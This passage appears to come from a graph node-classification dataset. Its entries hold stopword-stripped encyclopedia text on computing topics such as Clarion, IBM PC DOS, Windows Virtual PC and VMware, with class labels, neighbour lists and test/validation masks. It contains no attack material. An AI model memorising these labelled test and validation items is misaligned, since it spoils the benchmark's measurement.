      5483,
      10097,
      9078,
      7543,
      3966,
      1409,
      3462,
      910,
      8605,
      1952,
      8609,
      5031,
      6067,
      438,
      6074,
      10683,
      10684,
      5054,
      3519,
      5567,
      9152,
      9665,
      10193,
      5078,
      4056,
      482,
      10722,
      487,
      3560,
      3561,
      3562,
      7146,
      5612,
      8169,
      9195,
      9714,
      6133,
      5114,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 6144,
    "label": 0,
    "text": "EXMARaLDA:exmaralda exmaralda extensible markup language discourse annotation set free software tools creating managing analyzing spoken language corpora consists transcription tool comparable tools like praat transcriber tool administering corpus meta data tool queries kwic searches spoken language corpora exmaralda used conversation discourse analysis dialectology phonology research first second language acquisition children adults exmaralda based open standards xml unicode programmed java",
    "neighbors": [
      10409,
      5677,
      6797,
      7983,
      823,
      9787,
      5212,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 6145,
    "label": 0,
    "text": "GermaNet:germanet germanet lexical-semantic net german language relates nouns verbs adjectives semantically grouping lexical units express concept synsets defining semantic relations synsets germanet free academic use signing license germanet much common english wordnet viewed on-line thesaurus light-weight ontology germanet developed maintained within various projects research group general computational linguistics university tübingen since 1997 integrated eurowordnet multilingual lexical-semantic database germanet partitions lexical space set concepts interlinked semantic relations semantic concept modeled synset synset set words called lexical units words taken almost meaning.thus synset set synonyms grouped one definition gloss addition gloss synsets labeled syntactic function accompanied example sentences distinct meaning synset wordnet word category semantic space divided number semantic fields closely related major nodes semantic network ort location körper body etc following up-to-date statistics germanet version 11.0 contents release may 2016 germanet data stored relational postgresql 5 database database model follows internal structure germanet tables store synsets lexical units conceptual lexical relations etc distribution format germanet data xml two types files one synsets relations represent data available germanet database several application programming interfaces api available java perl apis distributed freely provide easy access information various versions germanet germanet 11.0 released may 2016 free academic distributed one following types license agreements open-de-wordnet freely available wordnet-compatible alternative germanet germanet used variety applications including semantic analysis shallow recognition implicit document structure compound analysis analyzing sectional preferences word sense disambiguation etc",
    "neighbors": [
      416,
      8582,
      7597,
      5677,
      7839,
      2100,
      10452,
      8539,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6146,
    "label": 5,
    "text": "Karn's_algorithm:karn algorithm karn algorithm addresses problem getting accurate estimates round-trip time messages using transmission control protocol tcp computer networking algorithm also sometimes termed karn-partridge algorithm proposed paper phil karn craig partridge 1987 accurate round trip estimates tcp difficult calculate ambiguity created retransmitted segments round trip time estimated difference time segment sent time acknowledgment returned sender packets re-transmitted ambiguity acknowledgment may response first transmission segment subsequent re-transmission karn algorithm ignores retransmitted segments updating round-trip time estimate round trip time estimation based unambiguous acknowledgments acknowledgments segments sent simplistic implementation karn algorithm lead problems well consider happens tcp sends segment sharp increase delay using prior round-trip time estimate tcp computes timeout retransmits segment tcp ignores round-trip time retransmitted packets round trip estimate never updated tcp continue retransmitting every segment never adjusting increased delay solution problem incorporate transmission timeouts timer backoff strategy timer backoff strategy computes initial timeout timer expires causes retransmission tcp increases timeout generally factor two algorithm proven extremely effective balancing performance efficiency networks high packet loss ideally karn algorithm would needed networks high round-trip time retransmission timeouts investigated using root cause analysis techniques",
    "neighbors": [
      10924,
      8628
    ],
    "mask": "Test"
  },
  {
    "node_id": 6147,
    "label": 9,
    "text": "Clarion_(programming_language):clarion programming language clarion commercial proprietary 4gl multi-paradigm programming language integrated development environment softvelocity used program database applications compatible isam sql ado data access methods reads writes several flat file desktop database formats including ascii csv dos binary foxpro clipper dbase relational databases via odbc ms sql server sybase sql anywhere oracle use accelerated native database drivers xml clarion used output html xml plaintext pdf among others clarion development environment ide sits top clarion programming language ide provides code generation facilities via system templates allow programmers describe program abstract level higher actual code statements generator turns higher level code turn compiled linked using normal compiler linker generation layer sometimes referred 4gl programming.the generation layer required possible create programs completely code level so-called 3gl layer bypassing code generation facilities templates used generate code programmers able inject code generated code alter extend functionality offered template layer process embedding code done viewing surrounding generated code mixing template code generated code allows template settings updated code regenerated without loss embedded code templates code generated provided source form developers free create templates large collection templates written various developers offered commercial add-ons free several clarion products available clarion professional edition clarion enterprise edition clarion.net first release clarion language dos product called clarion 1.0 first released april 1986 clarion created bruce barrington one founders healthcare firm hbo company later acquired mckesson corporation small team developers barrington goal create language would compact expressive would maximize use memory-mapped screen ibm pc creating screen designer version 1 produced pseudocode initial release included screen designer interpreter editor debugger initially supported databases composed dat files clarion ’ proprietary isam file format bruce barrington formed barrington systems released version 1.0 clarion 1.0 required use dongle time industry sentiment turning dongles offset ability create royalty-free applications however dongle removed release 1.1 time even basic version sold called personal developer limited user could adequate basic database applications fraction cost professional developer 1.x version 2.0 released may 1988 known clarion professional developer cpd included component called designer incorporated data dictionary cpd generated clarion code based contents dictionary template called model file model file text file could modified limited ways create custom code model file implemented browse form paradigm data initially displayed user list box updating done via form called via buttons associated list designer created essential crud create read update delete code developers could enhance functionality inserting code specified points generated code hand-coding new procedures clarion professional developer also introduced language extension modules lems could extend clarion language using modules compiled languages built lem format clarion software many third-party tool developers created lems purposes including extension connecting databases dbase clipper paradox cpd 2.x database solution everything required screens reports databases help files version clarion 2.x end-users clarion personal developer also released business user creating personal applications around time period clarion released clarion report writer created stand-alone product end-users clarion personal developer users programs written developers cpd built-in program bundled clarion professional developer version 2.1 released 1989 1991 barrington licensed compiler technology company called jensen partners international jpi jpi founded 1987 niels jensen earlier 1979 1981 one founders borland philippe kahn marketing personnel built borland around 99 turbo pascal compiler niels team working new compiler technology borland philippe kahn decided buy wizard c call turbo c. niels several developers left borland started jpi continued work compiler technology christened topspeed bought borland 1.7 million clarion database developer 3.0 cdd released 1993 revolutionary product adding many features technology could create programs “ windows like ” cua common user access user interface much cdd changes fit well windows programming paradigm laid groundwork future clarion windows product cdd ide completely new based jpi ide included many professional programmer quality tools editor project system compiler linker visual debugger gone p-code cpd jpi compiler clarion language produced true machine code exes libs dlls binaries could compiled protected mode allowing dos programs use extended memory breaking 640kb barrier clarion 3.0 language enhanced many ways e.g new data types cstring pstring date time ushort ulong file driver system e.g btrieve clarion dbase foxpro paradox queues tables enhanced screen processing enhanced cua code generation models replaced “ templates ” features extensible allowed generation much robust complex code new power came complexity many existing users found transition cdd difficult cpd simple easy use attracted many non-programmers could build programs answering questions cdd suited professional programmers programs could still developed easily size vast features ide made appear complex first 5 patch releases cdd buggy point unusable caused many users abandon product nearly complete disaster company clarion kept working cdd version 3.007 usable version 3.1 named clarion dos cfd released 1995 proved much stable time little interest dos development tools significant feature topspeed file driver isam file format allowing indexes multiple data files contained one disk file time relationship clarion software jpi grew closer april 30 1992 clarion merged jpi form entity would eventually called topspeed corporation employees topspeed development centre london went work cdd ironed many bugs topspeed released clarion windows version 1.0 a.k.a cw 1.0 january 1995 final 1.003 release june 1995 ide completely written windows gui could produce win16 exe dll binaries run windows 3.x language featured many enhancements required support event driven windows user interface clarion developer could easily create multithreaded mdi application cw 1.0 continued database flexibility added cdd well adding odbc driver allowing connection sql databases source supported odbc dos monolithic template model significantly enhanced cw 1.0 replaced model allowed window use multiple templates extension control procedure templates example dos screen procedure could support browsing single data table cw 1.0 window could use multiple browse control templates one displaying different table design change major improvement power clarion code generation clarion windows version 1.5 a.k.a cw 1.5 released september 1995 final 1.502 release january 1996 version added support creating native win32 binaries windows 95 windows nt 4 source could target win16 win32 ide remained 16-bit added 32-bit compilers linker debugger clarion windows version 2 a.k.a cw20 released june 1996 final 2.003 release march 1997 cw20 added classic object orientation language including inheritance encapsulation virtual methods overloading cw20 enhanced 32-bit support added activex support enhanced sql support clarion 4 a.k.a c4 released december 1997 final 4.002 release may 1998 topspeed elected skip dreaded version number three official explanation cw 1.5 cw 2.0 cw 2.0 cw 3.0 let ’ call next one version 4 due dos development dead name dropped windows title c4 came new template set class library called application builder classes “ abc ” original template set generated procedural code becoming increasingly complex abc template set generated far less code leveraged class library contained actual logic windows browses forms etc c4 enhanced oop adding constructors destructors without parameters clarion 5 a.k.a c5 released may 1998 final 5.0b release june 1999 product split professional enterprise editions clarion 5.5 a.k.a c55 released august 2000 final 5.507 release january 2002 c55 added interfaces oop clarion 6.0 a.k.a c6 released november 2003 added direct support pre-emptive multi-threading clarion 6.1 released may 2004 clarion 6.2 released may 2005 clarion 6.3 released jan 2006 excluding patches final release 16 bit clarion development environment use 16 bit ide produced problems using current windows technologies activex ocx com doc ... however note series 6.x clarion produces native win32 executables 32-bit exes and/or dlls previous versions produced 16-bit 32-bit executables 16-bit support dropped end-user product version 6.0 clarion april 13 2009 softvelocity released clarion 7 a.k.a c7 new ide look familiar sharpdevelop users softvelocity obtained commercial license sharpdevelop code integrated clarion code generation application generation technology fixed extended basic functionality major new features standard modern ide features lacking c6 include build system based msbuild backward compatibility releases clarion going back clarion windows 1.5 clarion still win32 development environment beta .net version clarion language called clarion available clarion c7 share ide although present shipped separate products unlike clarion 7 later releases clarion yet dictionary editor application generator expected single clarion7+/clarion.net ide would supported win32 .net development however given least 14 years passed since clarion.net announced without gold release clarion.net future unclear best new ide clarion mode retains ability build .net applications vb.net c september 12 2011 softvelocity released clarion 8 continues line clarion 7 latest release c7.3 august 2014 c9.1 gold released november 2015 clarion 10 released october 2018 clarion 11 released c10 re-worked build .net 4 clarion historically notable one first 4gl computer programming tools first developed 1980s trial version edition clarion time writing thus possible produce simple hello world program clarion without purchasing license first clarion documentation varying standard mixture enterprise level .net capabilities intertwined single one-serves-all help source result functionality described help together code snippets functionality specific product used example clarion.net documentation included even clarion.net product installed documentation specific one product though clearly labelled documentation lagged behind product clear completely reviewed every release example numerous references clarion 7 within clarion 9 documentation problem evidenced tutorial sample application level well clarion imperative programming language supports object orientated programming syntax clarion programming language case insensitive line endings treated implicit statement terminators unless explicit line continuation character used data program labels always declared column 1 code always indented column 2 onwards indentation optional code syntax resembles basic pascal structure although language quite different code blocks typically implicit start begin word used either explicit implicit end example period used place end statement code concatenated onto single line using separator case statement note period terminating statement block clarion generates code means templates code generated templates tends reliable especially template use time templates shipped source form edited however editing shipping templates recommended code generated templates augmented altered either creating additional custom templates embedding specific code templates capable generating text based file limited clarion language statements clarion language capable interacting dll produced languages compatible libraries using pascal method c method parameter passing windows api calls made directly language clarion data-centric meaning designed used among wide variety database vendors focused around data focus data starts data dictionary method formally declaring data tables dictionary used extensively templates generating program changes dictionary level cascade program causing automatic changes program data dictionary provides vendor independent method declaring tables turn means changing program one database vendor another relatively straightforward within constraints features chosen database provides clarion supports sql databases non-sql data stores support popular isam file types dbase btrieve etc built two proprietary isam file systems topspeed tps clarion dat also provided program code tables native data type table access provided standard dll interface known database driver separates program chosen data store abstraction allows chosen backend change either minimal changes program clarion natively supports following database formats including limited ascii basic btrieve clarion .dat topspeed .tps clipper dbaseiii dbaseiv dos foxpro/foxbase ms-sql t-sql odbc pervasive sql sqllite mysql oracle ado odbc driver allows access odbc source firebird postgres popular options accessed via odbc addition due ability readily interact .net class library able leverage latest technologies database perspective including asp.net others microsoft makes available including windows communication foundation windows communication foundation windows workflow foundation version clarion simple language resembling basic pascal addition objects classes areas data dictionary data declaration sections namely global data section module-specific data declaration section local data data declaration sections declare simple complex data type variable also declare prompt label mask picture whether read-only whether skipped form foreground background colors transparency whole host attributes ever drop variable form clarion ide adopts properties reflected automatically words data dictionary 'database sql terms contains information data also information represented applications make use database declaration time clarion developer spends defining data-dictionary time save later 4gl application generator produces output typically lists data full crud capabilities validation automatic lookup child tables demonstration hello world program clarion sample code shown hello world example example hand-written code clarion compiler gladly compile however developers write whole programs code level make use templates generate code ability describe program level higher code clarion popular non-programmers programmers limited skills abilities possible non-programmers generate sophisticated data based programs time either writing language code adding minimal amounts code one things clarion includes called global map inside procedure definitions declared including required declarations external dll libraries written non-clarion languages use clarion application clarion also ability generate dll consumed external non-clarion applications taking full advantage clarion 4gl capabilities simply plugging procedures created within map able leverage windows-api declarations using required no-longer documented data types core windows o/s easily clarion based .net version 4 version used develop clarion 10 ide allows developer use .net libraries advantage using clarion directly compilation clarion dll generates lib file compatible clarion windows allows clarion windows program call .net functionality clarion dll manner win32 dlls clarion developer wants use code compiled using languages use unmanaged exports nuget package developed robert gieseck https //www.nuget.org/packages/unmanagedexports unmanaged exports allows developer expose functions developed using .net native languages windows helpful forced maintain clarion product way upgrading third party tools due lack support third party tools rewritten .net ease",
    "neighbors": [
      6112,
      8868,
      4614,
      2183,
      8262,
      8393,
      4042,
      6797,
      10286,
      7983,
      9360,
      10289,
      10413,
      10899,
      11219,
      11030,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6148,
    "label": 2,
    "text": "IBM_PC_DOS:ibm pc dos ibm pc dos acronym ibm personal computer disk operating system discontinued operating system ibm personal computer manufactured sold ibm early 1980s 2000s ibm task force assembled develop pc decided critical components machine including operating system would come outside vendors radical break company tradition in-house development one key decisions made ibm pc industry standard time private company microsoft founded five years earlier bill gates eventually selected operating system ibm wanted microsoft retain ownership whatever software developed wanted nothing helping microsoft making suggestions afar according task force member jack sams reasons internal terrible problem sued people claiming stolen stuff could horribly expensive us programmers look code belonged someone else would come back say stole made money lost series suits n't want product clearly someone else product worked ibm people went microsoft proposition wanted product ibm first contacted microsoft look company july 1980 negotiations continued months followed paperwork officially signed early november although ibm expected customers would use pc dos ibm pc also supported cp/m-86 became available six months pc dos ucsd p-system operating systems ibm expectation proved correct one survey found 96.3 pcs ordered 40 pc dos compared 3.4 240 cp/m-86 history ibm pc dos various versions developed ibm and/or microsoft time pc dos 3.0 completed ibm team developers covering full os point time either ibm microsoft completely developed versions ibm pc dos going forward 1985 joint development agreement jda ibm microsoft development pc dos company giving company completely developed version time branded versions identical however cases companies made minor modifications version dos fall 1984 ibm gave source code documentation internally developed ibm topview dos microsoft microsoft could fully understand develop object-oriented operating environment overlapping windows development windows 2.0 multitasking windows used cooperative method share cpu entire life windows 1.0 millennium microsoft first licensed purchased 86-dos seattle computer products scp modified ibm pc microsoft employee bob o'rear assistance scp later microsoft employee tim paterson o'rear got 86-dos run prototype pc february 1981 86-dos converted 8-inch 5.25-inch floppy disks integrated bios microsoft helping ibm write ibm people writing requirements computer microsoft writing code o'rear often felt overwhelmed number people deal esd entry systems division facility boca raton florida perhaps first public mention operating system july 1981 byte discussed rumors forthcoming personal computer cp/m-like dos ... called simply 'ibm personal computer dos 86-dos rebranded ibm pc dos 1.0 august 1981 release ibm pc initial version dos largely based cp/m-80 1.x architecture function calls file-naming conventions copied directly older os significant difference fact introduced different file system fat12 unlike later dos versions date time commands separate executables rather part command.com single-sided 160 kilobyte kb 5.25 floppies disk format supported late 1981 paterson microsoft began writing pc dos 1.10 debuted may 1982 along revision b ibm pc support new double-sided drives added allowing 320 kb per disk number bugs fixed error messages prompts made less cryptic debug utility able load files greater 64k size later group microsoft programmers primarily paul allen mark zbikowski aaron reynolds began work pc dos 2.0 completely rewritten dos 2.0 added subdirectories hard disk support new ibm xt debuted march 1983 new 9-sector format bumped capacity floppy disks 360 kb unix-inspired kernel featured file handles place cp/m-derivative file control blocks loadable device drivers could used adding hardware beyond ibm pc bios supported basic utilities provided dos substantially upgraded well major undertaking took almost 10 months work dos 2.0 twice big dos 1.x occupying around 28k ram compared 12k predecessor would form basis microsoft consumer-oriented oses 2001 windows xp based windows nt released october 1983 officially november 1 dos 2.1 debuted fixed bugs added support half-height floppy drives new ibm pcjr 1983 compaq released compaq portable first 100 ibm pc compatible licensed oem version dos 1.10 quickly replaced dos 2.00 microsoft pc compatibles followed suit included hardware-specific dos features although generic august 1984 ibm introduced intel 80286-derived ibm pc/at next-generation machine along dos 3.00 despite jumping whole version number proved little incremental upgrade adding nothing substantial support new 1.2 megabyte mb floppy disks planned networking capabilities dos 3.00 judged buggy usable microsoft disabled prior os release case ibm original plans equip proper next-generation os would use extended features never materialized pc dos 3.1 released march 1985 fixed bugs dos 3.00 supported ibm network adapter card ibm pc network pc dos 3.2 added support 3½-inch double-density 720 kb floppy disk drives supporting ibm pc convertible ibm first computer use 3½-inch floppy disks released april 1986 later ibm personal system/2 1987 june 1985 ibm microsoft signed long-term joint development agreement share specified dos code create new operating system scratch known time advanced dos april 2 1987 os/2 announced first product produced agreement time ibm released next generation personal computers ibm personal system/2 ps/2 pc dos 3.3 released ps/2 line added support high density 3½-inch 1.44 megabyte mb floppy disk drives ibm introduced 80286-based higher ps/2 models upgrade dos 3.2 3.3 completely written ibm development effort part microsoft working advanced dos 1.0 dos 3.30 last version designed ibm xt floppy-only systems mind became one popular versions many users preferred buggy successor pc dos 4.0 internally known dos 3.4 originally shipped july 1988 dos 4.0 compatibility issues low-level disk utilities due internal data structure changes dos 4.0 used memory dos 3.30 also glitches newly added ems drivers compatible ibm ems boards common intel ast ones dos 4.0 also notable including first version dos shell full-screen utility designed make command-line os user-friendly microsoft took back control development released bug-fixed dos 4.01 dos 5 debuted june 1991 one biggest upgrades dos history dos 5 supported use high memory area hma upper memory blocks umbs 80286 later systems reduce conventional memory usage also dos commands supported option display command syntax aside ibm pc dos ms-dos version available oem editions vanished since time pcs 100 compatible customizations hardware differences longer necessary last version dos ibm microsoft shared full code dos integrated os/2 2.0 later windows nt virtual dos machine pc dos remained rebranded version ms-dos 1993 ibm microsoft parted ways—ms-dos 6 released march pc dos 6.1 separately developed followed june new features ms-dos 6.0 appeared pc dos 6.1 including new boot menu support new commands choice deltree move qbasic dropped ms-dos editor replaced ibm e editor pc dos 6.1 reports dos 6.00 pc dos 6.3 followed december pc dos 6.3 also used os/2 powerpc pc dos 6.3 also featured superstor disk compression technology addstor pc dos 7 released april 1995 last release dos ibm software development development ibm viavoice moved austin rexx programming language added well support new floppy disk format xdf extended standard 1.44 mb floppy disk 1.86 mb superstor disk compression technology replaced stac electronics stacker algebraic command line calculator utility program load device drivers command line added pc dos 7 also included many optimizations increase performance reduce memory usage recent retail release pc dos 2000 – released austin 1998 – found niche embedded software market elsewhere pc dos 2000 slipstream 7.0 y2k fixes applied applications pc dos 2000 reports ibm pc dos 7.00 revision 1 contrast original pc dos 7 reported ibm pc dos 7.00 revision 0 hitachi used pc dos 2000 legacy drive fitness test 4.15 hitachi feature tool 2.15 2009 thinkpad products copy latest version pc dos rescue recovery partition pc dos 7.1 added support logical block addressing lba fat32 partitions various builds 1999 2003 released retail used products ibm serverguide scripting toolkit build version dos appeared norton ghost symantec version 7.1 indicates support fat32 also ms-dos builds version dos limited kernel files ibmbio.com ibmdos.com command.com updated programs fdisk32 format32 allow one prepare fat32 disks additional utilities taken pc dos 2000 needed 1986 ibm announced pc dos support client access file services defined distributed data management architecture ddm enabled programs pcs create manage access record-oriented files available ibm system/36 ibm system/38 ibm mainframe computers running cics 1988 client support stream-oriented files hierarchical directories added pc dos became available ddm server systems",
    "neighbors": [
      10757,
      2055,
      10257,
      6675,
      10273,
      7217,
      8241,
      2045,
      573,
      8262,
      5220,
      9829,
      8301,
      2168,
      2172,
      4735,
      10883,
      4228,
      4244,
      7317,
      2201,
      7847,
      5293,
      178,
      9907,
      6325,
      11454,
      1219,
      8900,
      6342,
      3304,
      6893,
      5359,
      5363,
      3323,
      2811,
      2813,
      11008,
      4870,
      8976,
      3359,
      808,
      6442,
      11562,
      7983,
      5425,
      7986,
      9525,
      7483,
      7486,
      8517,
      2380,
      863,
      9569,
      3938,
      868,
      3429,
      5492,
      2933,
      375,
      1408,
      6529,
      3970,
      4996,
      7053,
      9619,
      11673,
      6557,
      3496,
      7088,
      9139,
      954,
      964,
      4548,
      8136,
      9166,
      4563,
      477,
      5603,
      1515,
      5612,
      4589,
      2545,
      6129,
      499,
      5623,
      8700,
      5629,
      1535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6149,
    "label": 4,
    "text": "WANSecure_Firewall:wansecure firewall wanbound company provides hardware software products small medium-sized offices products include firewalls vpn backup devices content filtering wansecure firewall remotely monitored managed firewall top management services provided secured wanbound services offered wansecure firewall include",
    "neighbors": [
      3941,
      3366,
      9488,
      10392,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6150,
    "label": 2,
    "text": "Windows_Virtual_PC:windows virtual pc windows virtual pc successor microsoft virtual pc 2007 microsoft virtual pc 2004 connectix virtual pc virtualization program microsoft windows july 2006 microsoft released windows version free product august 2006 microsoft announced macintosh version would ported intel-based macintosh computers effectively discontinuing product powerpc-based macintosh computers longer manufactured newest release windows virtual pc run versions windows earlier windows 7 officially support ms-dos operating systems earlier windows xp professional sp3 guests older versions support wider range host guest operating systems remain available starting windows 8 hyper-v supersedes windows virtual pc virtual pc virtualizes standard ibm pc compatible device associated hardware supported windows operating systems run inside virtual pc operating systems linux may run officially supported microsoft provide necessary virtual machine additions include essential drivers linux connectix virtual pc microsoft virtual pc 2004 microsoft virtual pc 2007 windows virtual pc successive versions software windows virtual pc runs windows 7 supports running windows xp professional later earlier microsoft versions run older versions windows still available support operating systems older windows xp microsoft replaced hyper-v virtual pc originally developed macintosh application system 7.5 released connectix june 1997 first version virtual pc designed windows-based systems version 4.0 released june 2001 connectix sold versions virtual pc bundled variety guest operating systems including windows os/2 red hat linux virtualization importance enterprise users became clear microsoft took interest sector acquired virtual pc virtual server unreleased time connectix february 2003 virtual pc 4 requires mac os 8.5 later g3 g4 processor running windows windows 2000 red hat linux requires mac os 9.0 later virtual pc 4 first version expandable drive images virtual pc 5 requires mac os 9.1 newer mac os x 10.1 later usb support mac os x recommended run virtual pc 5 mac os x 400 mhz faster processor required earlier versions virtual pc supported following features removed microsoft virtual pc 2004 2007 windows virtual pc agreement connectix innotek gmbh makers virtualbox part oracle ported version 5.0 run os/2 host version also included guest extensions vm additions os/2 guests could run windows os/2 mac os x hosts using virtual pc versions 5 6 7 new version guest extensions later included microsoft virtual pc 2004 july 12 2006 microsoft released virtual pc 2004 sp1 windows free charge mac version made free equivalent version mac version 7 final version virtual pc mac ran mac os x 10.2.8 later powerpc proprietary commercial software product virtual pc 2007 released windows platform public beta testing beginning october 11 2006 production release february 19 2007 added support hardware virtualization viewing virtual machines multiple monitors support windows vista host guest windows aero interface disabled windows vista guests due limitations emulated video hardware however aero effects rendered connecting guest via remote desktop services aero-enabled windows vista host provided guest running windows vista business higher edition may 15 2008 microsoft released virtual pc 2007 service pack 1 added support windows xp sp3 windows vista sp1 guest host oses well windows server 2008 standard guest os hotfix rollup virtual pc 2007 sp1 released february 20 2009 solved networking issues enhanced maximum screen resolution 2048×1920 32-bit enabling 16:9 resolutions 1920×1080 security update released july 14 2009 address elevation privilege vulnerability guest operating systems microsoft virtual pc 2004 2007 work windows 10 64-bit even 32-bit platforms lack internet connectivity due lack vpc driver also impacts windows mobile emulators windows virtual pc entered public beta testing april 30 2009 released alongside windows 7 unlike predecessors version supports windows 7 host operating systems originally required hardware virtualization support march 19 2010 microsoft released update microsoft virtual pc allows run pcs without hardware support windows virtual pc available free charge certain editions windows 7 either pre-installed oems via download microsoft website new features include system requirements windows virtual pc windows xp mode xpm virtual machine package windows virtual pc containing pre-installed licensed copy windows xp professional service pack 3 guest os previously cpu motherboard host support hardware virtualization update early 2010 eliminated requirement pre-installed integration components allow applications running within virtualized environment appear running directly host sharing native desktop start menu windows 7 well participating file type associations windows xp mode applications run terminal services session virtualized windows xp accessed via remote desktop protocol client running windows 7 host applications running windows xp mode compatibility issues actually running inside windows xp virtual machine redirected using rdp windows 7 host windows xp mode may used run 16-bit applications includes ntvdm although might impossible run 16-bit applications require hardware acceleration windows virtual pc hardware acceleration windows xp mode available free charge users windows 7 professional enterprise ultimate users editions windows 7 eligible download use restriction apply windows virtual pc windows xp mode also run vmware player vmware workstation however like virtual pc vmware products import windows xp mode windows 7 professional enterprise ultimate adhere microsoft licensing requirements virtual pc emulates following environments implementation earlier versions virtual pc supported following features removed microsoft virtual pc 2004 2007 windows virtual pc windows virtual pc may enable guest operating systems running inside virtual machines interact host operating system beyond feasible two physical computers sharing physical hardware components exchanging data however integration components must installed guest operating systems integration component installed mean communicating two machines either virtual physical virtual network interface even mouse cursor controlled one operating system either real virtual given time however integration components installed guest operating systems following features automatically activated addition features described guest operating systems may also take advantage following integration features administrator activates windows virtual pc enabling integration features automatically makes virtual machine user account accessible using remote desktop connection virtual pc allows multiple guest operating systems run virtualized single physical host although number popular host guest operating systems lack official microsoft support sometimes technical obstacles impeding installation instead configuration may unsupported due microsoft licensing restrictions decision focus testing support resources elsewhere especially production use legacy product fades program manager microsoft core virtualization team explains official support entails product positioned desktop use virtual pc provides official support different set operating systems server-oriented counterpart microsoft virtual server advanced hyper-v latter products support range server operating systems virtual pc 2007 supports one variety host another guest successor windows virtual pc supports none whereas virtual server hyper-v officially supported select linux guests since 2006 2008 respectively microsoft release virtual pc officially supported linux nonetheless number linux distributions run successfully virtual pc 2007 used virtual machine additions virtual server see lastly 64-bit host support introduced virtual pc 2007 release able virtualize 64-bit guest microsoft thus far reserved functionality hyper-v runs 64-bit x64 editions windows server 2008 windows server 2012 windows server 2012 r2 windows server 2016 windows 8/8.1 pro enterprise windows 10 pro enterprise education following table notes support refers official microsoft support described notes – details microsoft support notes – supported installations installing linux-based guest environment virtual pc possible redhat suse linux guests supported linux additions supported microsoft virtual server additions also work virtual pc linux distributions must installed text mode support microsoft virtual pc emulated graphics chip ubuntu 8.10 intrepid ibex must installed safemode require changes websites specialize listing operating systems run successfully virtual pc guests help users avoid issues installing linux distributions operating systems lacking official microsoft support microsoft announced august 7 2006 virtual pc mac would ported intel mac platform microsoft stated alternative solutions offered apple vendors combined fully packaged retail copy windows satisfy need similar products available announced time parallels desktop vmware fusion",
    "neighbors": [
      2058,
      3082,
      4112,
      9745,
      9780,
      7733,
      8757,
      5697,
      582,
      5702,
      6730,
      7248,
      4695,
      3167,
      10338,
      617,
      8315,
      636,
      1150,
      639,
      641,
      9353,
      651,
      6797,
      4238,
      10900,
      2212,
      6827,
      7349,
      2236,
      4289,
      10957,
      6377,
      8439,
      5368,
      5378,
      4356,
      11524,
      6924,
      782,
      8466,
      11549,
      7970,
      6438,
      295,
      1832,
      10537,
      7983,
      3890,
      9525,
      823,
      6972,
      318,
      6462,
      9033,
      1362,
      7507,
      11605,
      2910,
      11103,
      11631,
      8561,
      372,
      1935,
      8080,
      4505,
      3496,
      10153,
      9655,
      5049,
      7106,
      4051,
      9173,
      11221,
      5080,
      9693,
      6114,
      1513,
      4074,
      1515,
      8681,
      6129,
      499,
      10747,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 6151,
    "label": 3,
    "text": "AMD_K6:amd k6 k6 microprocessor launched amd 1997 main advantage particular microprocessor designed fit existing desktop designs pentium-branded cpus marketed product could perform well intel pentium ii equivalent significantly lower price k6 considerable impact pc market presented intel serious competition amd k6 superscalar p5 pentium-class microprocessor manufactured amd superseded k5 amd k6 based nx686 microprocessor nexgen designing acquired amd despite name implying design evolving k5 fact totally different design created nexgen team including chief processor architect greg favor adapted amd purchase k6 processor included feedback dynamic instruction reordering mechanism mmx instructions floating-point unit fpu also made pin-compatible intel pentium enabling used widely available socket 7 -based motherboards like amd k5 nx586 nx686 k6 translated x86 instructions fly dynamic buffered sequences micro-operations later variation k6 cpu k6-2 added floating-point-based simd instructions called 3dnow k6 originally launched april 1997 running speeds 166 200 mhz followed 233 mhz version later 1997 initially amd k6 processors used pentium ii-based performance rating pr2 designate speed pr2 rating dropped rated frequency processor real frequency release 266 mhz version chip second quarter 1998 amd able move 0.25-micrometre manufacturing process lower voltage higher multiplier k6-266 meant fully compatible socket 7 motherboards similar later k6-2 processors final iteration k6 design released may 1998 running 300 mhz",
    "neighbors": [
      3586,
      3459,
      5380,
      8322,
      9092,
      8327,
      10375,
      6924,
      1677,
      398,
      5645,
      8851,
      7963,
      1820,
      4252,
      2719,
      6815,
      5541,
      11047,
      2094,
      5821,
      8125,
      6978,
      7234,
      3911,
      11080,
      2764,
      5326,
      473,
      2791,
      3175,
      5225,
      7913,
      9707,
      1260,
      1005,
      5356,
      9964,
      1776,
      1137,
      10601,
      499,
      2549,
      630,
      1915,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 6152,
    "label": 5,
    "text": "KA9Q:ka9q ka9q also called ka9q nos simply nos popular early implementation tcp/ip associated protocols amateur packet radio systems smaller personal computers connected via serial lines named amateur radio callsign phil karn first wrote software cp/m system ported dos ibm pc ka9q code open-source many radio amateurs modified many different versions available time ka9q later maintained anthony frost callsign g8udv adam goodfellow ported acorn archimedes jonathan naylor g4klx 1995 standard access software provided british dial-up internet service provider demon internet modern operating systems provide built-in implementation tcp/ip protocol linux especially includes necessary kernel functions support utilities tcp/ip amateur radio systems well basic ax.25 net/rom functionality therefore nos regarded obsolete original developer still may uses embedded systems small linux ka9q also name ip-over-ip tunneling protocol",
    "neighbors": [
      2306,
      1030,
      1192,
      9868,
      10862,
      4335,
      4409,
      5531
    ],
    "mask": "Test"
  },
  {
    "node_id": 6153,
    "label": 7,
    "text": "VMware:vmware vmware inc. publicly traded software company listed nyse stock ticker vmw dell technologies majority share holder vmware provides cloud computing virtualization software services one first commercially successful companies virtualize x86 architecture vmware desktop software runs microsoft windows linux macos enterprise software hypervisor servers vmware esxi bare-metal hypervisor runs directly server hardware without requiring additional underlying operating system 1998 vmware founded diane greene mendel rosenblum scott devine ellen wang edouard bugnion greene rosenblum married first met university california berkeley edouard bugnion remained chief architect cto vmware 2005 went found nuova systems part cisco first year vmware operated stealth mode roughly 20 employees end 1998 company launched officially early second year february 1999 demo conference organized chris shipley first product vmware workstation delivered may 1999 company entered server market 2001 vmware gsx server hosted vmware esx server hostless 2003 vmware launched vmware virtual center vmotion virtual smp technology 64-bit support introduced 2004 january 9 2004 terms definitive agreement announced december 15 2003 emc dell emc acquired company 625 million cash august 14 2007 emc sold 15 vmware public via initial public offering shares priced per share closed day july 8 2008 disappointing financial performance board directors fired vmware co-founder president ceo diane greene replaced paul maritz retired 14-year microsoft veteran heading emc cloud computing business unit greene ceo 